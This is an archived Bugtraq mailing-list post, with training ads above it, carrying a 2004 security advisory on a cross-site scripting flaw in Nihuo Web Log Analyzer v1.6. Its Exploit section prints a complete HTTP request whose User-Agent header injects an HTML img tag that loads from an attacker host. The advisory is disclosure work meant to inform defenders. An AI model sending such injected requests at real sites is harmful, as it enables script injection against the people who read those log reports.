Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Cross-Site Scripting (XSS) in Nihuo Web Log Analyzer

from [Audun Larsen] Network Security [Permanent Link]
Subject: Cross-Site Scripting (XSS) in Nihuo Web Log Analyzer
Date: 20 Aug 2004 19:25:29 -0000 


---------------------------------------------------------------------------
          Cross-Site Scripting (XSS) in Nihuo Web Log Analyzer
---------------------------------------------------------------------------
Author:         Audun Larsen (larsen at xqus dot com)
Date:           Aug 20, 2004


Affected software:
==================
Name:           Nihuo Web Log Analyzer
URL:            http://www.loganalyzer.net/index.html
Version:        v1.6 (older versions not tested)
Released:       Feb 17, 2004


Vendors description:
====================
Nihuo Web Log Analyzer can generate a wide range of reports and statistics from 
your log file - more than 80 different reports with 2D and 3D graphs.


Introduction:
=============
Most developers know that input validation is important. If you look at the 
history of PHP-nuke you can see that software that does not check the user
input thoroughly, is insecure.


Discussion:
===========
Many think that http access-log analyzers don't get any input from the user.
But think about it, both the user-agent and the referer header is data that can 
be manipulated by the user.
Nihuo Web Log Analyzer is vulnerable to just this type of attack.


Exploit:
========
To exploit Nihuo Web Log Analyzer we have to send a special HTTP request that 
includes malicious code.

GET / HTTP/1.1
Host: sample.com
Connection: close
Accept: text/plain
Accept-Language: en-us,en
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
User-Agent: Some-Fake-UA <img src='http://attacker.host.com/app.gif'>

Generating this HTTP request can easily be done in Perl, PHP or any other 
language. Generating enough hits with this user-agent will cause the user-agent 
to appear in the "Top Browsers" list, with the HTML code
included. Notice that single quotes is used in the User-Agent.


Tested with:
============
Apache 1.3.x
Nihuo Web Log Analyzer v1.6 (Running on Win2k)


Solution:
=========
No solution available at the time writing.
Vendor notified Aug 20, 2004.


Disclaimer: 
===========
The information in this advisory and any of its demonstrations is provided "as 
is" without warranty of any kind.

Copyright © 2004 Audun Larsen
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Cross-Site Scripting (XSS) in Nihuo Web Log Analyzer, Audun Larsen <=
Previous by Date:  BadBlue Webserver v2.5 Denial Of Service Vulnerability, GulfTech Security
Next by Date:  NetBSD Security Advisory 2004-009: ftpd root escalation, NetBSD Security-Officer
Previous by Thread:  BadBlue Webserver v2.5 Denial Of Service Vulnerability, GulfTech Security
Next by Thread:  NetBSD Security Advisory 2004-009: ftpd root escalation, NetBSD Security-Officer
Indexes:  [Date] [Thread] [Top] [All Lists]